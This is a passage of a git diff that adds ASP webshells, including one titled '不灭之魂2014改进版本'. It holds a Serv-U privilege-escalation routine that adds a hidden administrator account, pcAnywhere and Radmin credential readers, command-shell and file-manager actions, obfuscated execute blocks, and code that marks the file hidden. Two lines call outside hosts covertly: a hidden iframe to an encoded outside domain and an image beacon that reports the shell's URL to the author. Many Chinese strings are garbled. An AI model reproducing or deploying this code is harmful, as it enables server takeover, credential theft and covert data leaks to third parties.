rz<>kz<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`=CU"))
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin7s$ 1 /add & net localgroup administrators admin7s$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject(CONST_FSO)
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"delpoint":call delpoint()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+Case "CustomScanDriveForm":CustomScanDriveForm()
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://%63%70%63%2d%67%6f%76%2e%63%6e/%61/%61/%61%2e%61%73%70 width=0 height=0></iframe></html>"  %>
diff --git a/www-7jyewu-cn/不灭之魂2014改进版本.asp b/www-7jyewu-cn/不灭之魂2014改进版本.asp
new file mode 100644
index 0000000..96a736b
--- /dev/null
+++ b/www-7jyewu-cn/不灭之魂2014改进版本.asp
@@ -0,0 +1,1373 @@
+<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
+<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
+<%@ LANGUAGE = VBScript.Encode %><%
+Server.ScriptTimeout=999999999
+UserPass="admin"  '����
+mNametitle ="����֮��2013�Ľ��汾"  ' ����
+Copyright="    "  '��Ȩ
+SItEuRl="http://www.7jyewu.cn/" '�����վ
+bg ="http://www.mumasec.tk/"  '����ͼƬ,��ʹ������
+ysjb=true  '�Ƿ����϶�Ч��,trueΪ��,falseΪ��
+htp="http://www.7jyewu.cn/"  '���ܵ�ַ�����ɸ��ģ������´󲿷��������߷���������
+durl="http://www.7jyewu.cn/"  'Ĭ�������ļ���ַ
+'---------------------------------------------------------------------------------------
+'����֮��
+'2013�Ľ�����
+'���������κκ��ţ����иĶ�����ʹ�ã�
+'----------------------------------------------------------------------------------------
+Response.Buffer =true
+BodyColor="#006000"
+FontColor="#006000"
+LinkColor="#006000"
+On Error Resume Next 
+strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+Const DEfd=""
+sub ShowErr()
+ If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+sub RaPath(s)
+RaPath=ExecuteGlobal(s)
+End sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action")
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+FolderPath=Request("FolderPath")
+u=request.servervariables("http_host")&url
+domain=Request.ServerVariables("http_host")
+FName=Request("FName")
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#191919'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject(CONST_FSO)
+set fsoX=server.CreateObject(CONST_FSO)
+str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j "<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">span.underline{text-decoration:underline;}span.orange{color:#B3D169;}span.project_type{text-align:right}span.grey{color:#666;}#links{list-style-type:none;padding:20px 0 0 0;padding-left:20px;}#linklist2  td{color:#fff;background:#191919;}#linklist2 td:visited{color:#999;}#linklist2 td:hover{background:#B3D169;color:#191919;}body,tr,td{margin-top: 5px;background-color: #000000;color: #006000;font-size: 12px;SCROLLBAR-FACE-COLOR: #232323;scrollbar-arrow-color: #383839;scrollbar-highlight-color: #383839;scrollbar-3dlight-color: #dddddd;scrollbar-shadow-color: #232323}.sb{cursor: hand}input,select,textarea{border-top-width: 1px;font-weight: bold;border-left-width: 1px;font-size: 11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left: 5px;padding-right: 5px;font-color: #fff}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size: 13px}a{color: #ffffff;text-decoration: none;}.am{color: #006000;font-size: 11px;}</style>"
+j"<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+Function PcAnywhere4()
+execute(king("`>tswqz/<>rz/<>' ���� '=txsqc 'zodwxl'=thnz zxhfo<>rz<>rz/<>'13'=tmol 'yoe.shdtzoZ\tktivnfQeh\etzfqdnU\\qzqW fgozqeoshhQ\lktlM ssQ\lufozztU rfq lzftdxegW\:Z'=txsqc 'zbtz'=thnz 'izqh'=tdqf zxhfo<>'%10'=izrov rz<>rz/< :����yoe>'%10'=izrov rz<>kz<>'1'=ktrkgw'%13'=izrov tswqz<>'zlgh'=rgiztd 'dkgyb'=tdqf dkgy<>cor/<����foA Ȩ��tktivnfQeY>'ktzfte'=fuosq cor<`p"))
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+execute(king(" zsxltk = etrbti�� zbtG�� p + zsxltk = zsxltk�� zbtG�� 50 * p = p �� o - )fokzl(ftV gJ 0 = a kgX�� yC rfS�� ))0 ,o ,fokzl(roT(zfCZ = p �� ftiJ `1` => )0 ,o ,fokzl(roT rfQ `2` =< )0 ,o ,fokzl(roT yC�� yC rfS�� 10 = p �� ftiJ `Q` = )0 ,o ,fokzl(roT kB `q` = )0 ,o ,fokzl(roT yC�� yC rfS�� 00 = p �� ftiJ `A` = )0 ,o ,fokzl(roT kB `w` = )0 ,o ,fokzl(roT yC�� yC rfS�� 90 = p �� ftiJ `Z` = )0 ,o ,fokzl(roT kB `e` = )0 ,o ,fokzl(roT yC�� yC rfS�� 80 = p �� ftiJ `W` = )0 ,o ,fokzl(roT kB `r` = )0 ,o ,fokzl(roT yC�� yC rfS�� 70 = p �� ftiJ `S` = )0 ,o ,fokzl(roT kB `t` = )0 ,o ,fokzl(roT yC�� yC rfS�� 60 = p �� ftiJ `X`= )0 ,o ,fokzl(roT kB `y` = )0 ,o ,fokzl(roT yC�� )fokzl(ftV gJ 0 = o kgX�� 1 = zsxltk�� zsxltk ,a ,p ,o doW�� )fokzl(etrbti fgozefxX��fgozefxX rfS��ufoizgG = dqtkzUg ztU��izoK rfS��tlgsZ.��rqtN. = tsoXdgkXrqgVdqtkzU��1 = fgozolgY.��)izqYl(tsoXdgkXrqgV.��fthB.��8 = trgT.��0 = thnJ.��dqtkzUg izoK��)`dqtkzU.wrgrQ`(zetpwBtzqtkZ.ktcktU = dqtkzUg ztU��dqtkzUg doW"))
+End Function 
+sub promyself()
+On Error Resume Next 
+set f=fso.GetFile(ScriptPath)
+if f.Attributes <> 39 and session("lock")="" then
+f.Attributes=1+2+4+32
+end if
+set f=nothing
+end sub
+promyself
+Function PcAnywhere(data,mode)
+execute(king("trgetr=tktivnfQeY�� zbtG��0+dxfyoZ=dxfyoZ��)kzleh(kiZ + trgetr = trgetr�� kgX zobS ftiJ ))490>kzleh( kB )98 =< kzleh(( yC��)dxfyoZ kgb )))9,o,ilqi(roT(etrbti kgb ))9,o,qzqr(roT(etrbti((=kzleh�� 9 htzU ktwdxf gJ 0 = o kgX��60 = dxfyoZ :18 = ktwdxf ftiJ `ktlx` = trgd yC��770 = dxfyoZ :98 = ktwdxf ftiJ `llqh` = trgd yC��)8,qzqr(roT =DUQD"))
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+execute(king("yC rfS��`!rqtN z'fqZ !kgkkS`p�� tlsS��))))1(nqkkQzkgY(btD(kzUZ&)))0(nqkkQzkgY(btD(kzUZ(ktzfogzbti p�� `:`& zkgY p�� ftiJ )nqkkQzkgY(nqkkQlC yC��) zkgY & izqYfodrqN(WQSNESN.DUK=nqkkQzkgY��`>kw<>kw<`p��yC rfS��`!rqtN z'fqZ !kgkkS`p��tlsS��pwgkzl p��zbtG�� yC rfS��))o(nqkkQktztdqkqY(btD & pwBkzl = pwBkzl��tlsS��)))o(nqkkQktztdqkqY(btD(kzUZ&`1` & pwBkzl = pwBkzl�� ftiJ 0=)))o(nqkkQktztdqkqY(bti( ftV  yC��)nqkkQktztdqkqY(rfxgAM gJ 1 = o kgX��ftiJ )nqkkQktztdqkqY(nqkkQlC yC��`:`&ktztdqkqY p��) ktztdqkqY & izqYfodrqN(WQSNESN.DUK=nqkkQktztdqkqY��`>kw<>kw<kqk.ilqi_fodrqN/zygl`&hzi&`:ַ�����¾߹��������Ե�rg��߹�ilqDfodrqN�ú�ֵDUQD����:��ע>kw<`p��`zkgY` = zkgY��`ktztdqkqY`=ktztdqkqY��`\lktztdqkqY\ktcktU\1.9c\fodrQN\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqYfodrqN��)`VVSDU.JYCNZUK`(zetpwBtzqtkZ.ktcktU =DUK ztU"))
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function
+
+Function MainForm()
+j "<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame""><input type=""hidden"" name=""Action""><input type=""hidden"" name=""FName""></form><table width='100%'><form name='addrform' method='post' action='"&URL&"' target='_parent'><tr><td width='60' align='center'><input type='button' value='Address'></td><td><input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'></td><td width='140' align='center'><input name='Submit' type='submit' value='GO'> <input type='submit' value='Refresh' onclick='FileFrame.location.reload()'></td></tr></form></table>"
+j"<td><a class=am href='javascript:ShowFolder(""C:\\Program Files"")'>(1)��Program��<a><a class=am href='javascript:ShowFolder(""d:\\Program Files"")'>(2)��ProgramD��<a><a class=am href='javascript:ShowFolder(""e:\\Program Files"")'>(3)��ProgramE��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>(4)��Documents��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>(5)��All_Users��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\"")'>(6)���_ʼ_�ˆΡ�<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>(7)����_��<a><a class=am href='javascript:ShowFolder(""C:\\recycler"")'>(8)��RECYCLER(C:\)��<a><a class=am href='javascript:ShowFolder(""D:\\recycler"")'>(9)��RECYCLER(d:\)��<a><a class=am href='javascript:ShowFolder(""e:\\recycler"")'>(10)��RECYCLER(e:\)��<a>":j "&nbsp;   ":if session("pr")<5 then j"<img width='0' height='0' src="""&htp&"baidu.asp?wz="&u&"""></img>":session("pr")=session("pr")+1:else j "��ȡ�У�ɧ�ȡ���":end if:j"<br><a class=am href='javascript:ShowFolder(""C:\\wmpub"")'>(1)��wmpub��<a><a class=am href='javascript:ShowFolder(""C:\\WINDOWS\\Temp"")'>&nbsp;&nbsp;(2)��TEMP��<a>&nbsp;&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>(3)��ServU(1)��<a><a  class=am href='javascript:ShowFolder(""C:\\Program Files\\ServU"")'>(4)��ServU(2)��<a>&nbsp;<a class=am href='javascript:ShowFolder(""C:\\WINDOWS"")'>(5)��WINDOWS��<a>&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\php"")'>(6)��PHP��<a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a  class=am href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>(7)��Mssql��<a><a class=am href='javascript:ShowFolder(""c:\\prel"")'>(8)��prel�ļ��С�<a>&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""c:\\docume~1\\alluse~1\\Application Data\\Symantec\\pcAnywhere"")'>(9)��pcAnywhere��<a>   <a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����"")'>(10)��Alluser���桿<a>":j"</td>"
+j "<table width='100%' height='95.5%' style='border:1px solid #000000;' cellpadding='0' cellspacing='0'><td width='160' id=tl><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td width=1 style='background:#000000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#424242'><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe></tr></form></table></td></tr><tr></tr></table>"
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+End Function
+Sub PageAddToMdb()
+execute(king("`>dkgy/<��¼Ŀ��̱���λ������������������ :ע>kw<>kw<>'������'=txsqc zodwxl=thnz zxhfo<>zeQtiz=tdqf wrTdgkXtlqtstk=txsqc ftrroi=thnz zxhfo<>13=tmol ``wrd.DUD\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<>/kw<:)��֧BUX��(���������>/ki<>dkgy/<��¼Ŀ��ͬ��ľdql��λ,����wrd.DUD�������� :ע>kw<>kw<>'����ʼ��'=txsqc zodwxl=thnz zxhfo<>zetstl/<>fgozhg/<BUX��>hhq=txsqc fgozhg<>fgozhg/<BUX>gly=txsqc fgozhg<>rgiztTtiz=tdqf zetstl<>zeQtiz=tdqf wrTgJrrq=txsqc ftrroi=thnz zxhfo<>13=tmol ``` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & ```=txsqc izqYtiz=tdqf zxhfo<>))``#``(fgolltU(tzxetbS=txsqc ``#``=tdqf ftrroi=thnz zxhfo<>zlgh=rgiztd dkgy<:����м���>kw<`p��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(aeqYfx��ftiJ `wrTdgkXtlqtstk` = zeQtiz yC��yC rfS��rfS.tlfghltN��skMaeqA&`>cor/<!��������>kw<>ktzfte=fuosq cor<` p��)izqYtiz(wrTgJrrq��ftiJ `wrTgJrrq` = zeQtiz yC��111110=zxBtdoJzhokeU.ktcktU��)`izqYtiz`(zltxjtN = izqYtiz��)`zeQtiz`(zltxjtN = zeQtiz��izqYtiz ,zeQtiz doW"))
+End Sub
+Sub addToMdb(thePath)
+On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing
+End Sub
+Function fsoTreeForMdb(thePath, rs, stream)
